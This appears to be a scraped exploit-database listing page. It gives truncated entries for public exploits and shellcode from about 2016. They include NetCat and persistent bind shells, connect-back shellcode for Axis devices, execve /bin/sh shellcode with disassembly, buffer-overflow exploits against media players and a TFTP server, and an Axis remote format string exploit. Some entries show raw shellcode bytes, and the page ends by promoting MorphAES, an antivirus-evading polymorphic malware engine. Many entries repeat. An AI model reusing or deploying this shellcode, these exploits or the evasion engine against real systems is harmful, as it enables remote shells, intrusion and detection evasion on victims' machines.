ownCloud: Arbitrary Code Injection in ownCloud’s Windows Client

The current ownCloud Windows Desktop client is prone to an arbitrary code injection vulnerability. The underlying issue is that the ownCloud desktop client tries to load QT extensions from C:\usr\i686-w64-mingw32\sys-root\mingw\lib\qt5\plugins. As any authenticated user on Windows is allowed to...

Linux/x86 - NetCat Bind Shell with Port (44, 52 bytes)

Linux/x86 - NetCat Bind Shell with Port 44, 52 bytes. Shellcode exploit for Linx86 platform...

Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)

include include include //| needed for C "fork" include //| needed for C "system" //| Exploit Title: Linux x86 NetCat bind shell with Port 44, 52 bytes //| Date: 7/28/2016 //| Exploit Author: CripSlick //| Tested on: Kali 2.0 x86 //| Version: NetCat v1.10-41 //| email protected //| OffSec ID:...

Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)

Windows 7 x86 - localhost Port Scanner Shellcode 556 bytes. Shellcode exploit for Winx86 platform...

Windows/x86 - localhost Port Scanner Shellcode (556 bytes)

/ Title : Windows x86 localhost port scanner shellcode Date : 29-07-2016 Author : Roziul Hasan Khan Shifat Tested on : Windows 7 x86 starter / / Disassembly of section .text: 00000000 : 0: 31 db xor %ebx,%ebx 2: 64 8b 43 30 mov %fs:0x30%ebx,%eax 6: 8b 40 0c mov 0xc%eax,%eax 9: 8b 70 14 mov...

CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)

Exploit for windows platform in category local exploits Exploit Title: CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow Egghunter+ASLR bypass Exploit Author: Karn Ganeshen Download link:...

CoolPlayer+ Portable 2.19.6 Stack Overflow

Exploit Title: CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow Egghunter+ASLR bypass Exploit Author: Karn Ganeshen Download link: https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable2.19.6.paf.exe/download?usemirror=liquidtelecom Version:...

Mediacoder 0.8.43.5852 - '.m3u' (SEH)

Exploit Title: MediaCoder 0.8.43.5852 - .m3u SEH Exploit Exploit Author: Karn Ganeshen Vendor Homepage: http://www.mediacoderhq.com Download link: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.45.5852.exe Version: Current version 0.8.43.58.52 Tested on: Windows Vista SP2...

Linux/x86-64 - Subtle Probing Reverse Shell, Timer, Burst, Password, Multi-Terminal (84, 122, 172 bytes)

Linux/x86-64 - Subtle Probing Reverse Shell, Timer, Burst, Password, Multi-Terminal 84, 122, 172 bytes. Shellcode exploit for Linx86-64 platform...

TFTP Server 1.4 - 'WRQ' Remote Buffer Overflow (Egghunter)

Exploit Title: TFTP Server 1.4 - WRQ Buffer Overflow Exploit Egghunter Exploit Author: Karn Ganeshen Vendor Homepage: http://sourceforge.net/projects/tftp-server/ Version: 1.4 Tested on: Windows Vista SP2 Coded this for Vista Ultimate, Service Pack 2 3-byte overwrite + short jump + Egghunter...

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)

Linux/CRISv32 - Axis Communication Connect Back Shellcode. Shellcode exploit for Linx86 platform / Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode Author: bashis / 2016 / include char sc = //close0 "\x7a\x86" // clear.d r10 "\x5f\x9c\x06\x00" // movu.w 0x6,r9 "\x3d\xe9" // break ...

Linux/x86 - execve /bin/sh Shellcode (19 bytes)

Linux/x86 - execve /bin/sh Shellcode 19 bytes. Shellcode exploit for Linx86 platform / Linux/x86 - execve /bin/sh shellcode 19 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 19 SLAE - 750 Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 50 push eax...

Linux/x86 - execve /bin/sh Shellcode (19 bytes)

/ Linux/x86 - execve /bin/sh shellcode 19 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 19 SLAE - 750 Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 50 push eax 8048063: 68 2f 2f 73 68 push 0x68732f2f 8048068: 68 2f 62 69 6e push 0x6e69622f 804806d...

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)

/ Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode Author: bashis / 2016 / include char sc = //close0 "\x7a\x86" // clear.d r10 "\x5f\x9c\x06\x00" // movu.w 0x6,r9 "\x3d\xe9" // break 13 //close1 "\x41\xa2" // moveq 1,r10 "\x5f\x9c\x06\x00" // movu.w 0x6,r9 "\x3d\xe9" // break 13...

Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83, 148, 177 bytes)

Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon 83, 148, 177 bytes. Shellcode exploit for Linx86-64 platform include include //| Exploit Title: Syscall Persistent Bind Shell + multi-terminal + password + daemon 83, 148, 177 bytes //| Date: 7/15/2016 //| Exploit...

Axis Communications MPQTPACS 5.20.x - Server-Side Include Daemon Remote Format String

Axis Communications MPQTPACS 5.20.x - Server-Side Include Daemon Remote Format String !/usr/bin/env python2.7 SOF Remote Format String Exploit Axis Communications MPQT/PACS Server Side Include SSI Daemon Research and development by bashis 2016 This format string vulnerability has following...

Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83, 148

include include //| Exploit Title: Syscall Persistent Bind Shell + multi-terminal + password + daemon 83, 148, 177 bytes //| Date: 7/15/2016 //| Exploit Author: CripSlick //| Tested on: Kali 2.0 x86x64 //| Version: No Program Version, Only Syscalls Used //| email protected //| OffSec ID: OS-20614...

Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String

Exploit for multiple platform in category remote exploits !/usr/bin/env python2.7 SOF Remote Format String Exploit Axis Communications MPQT/PACS Server Side Include SSI Daemon Research and development by bashis 2016 This format string vulnerability has following characteristic: - Heap Based...

Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String

!/usr/bin/env python2.7 SOF Remote Format String Exploit Axis Communications MPQT/PACS Server Side Include SSI Daemon Research and development by bashis 2016 This format string vulnerability has following characteristic: - Heap Based Exploiting string located on the heap - Blind Attack No output...

IDPS SandBox AntiVirus Stealth Killer: MorphAES

IDPS SandBox AntiVirus Stealth Killer MorphAES is the world’s first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it’s cross-platform as well and library-independent. Properties: Polymorphism AES...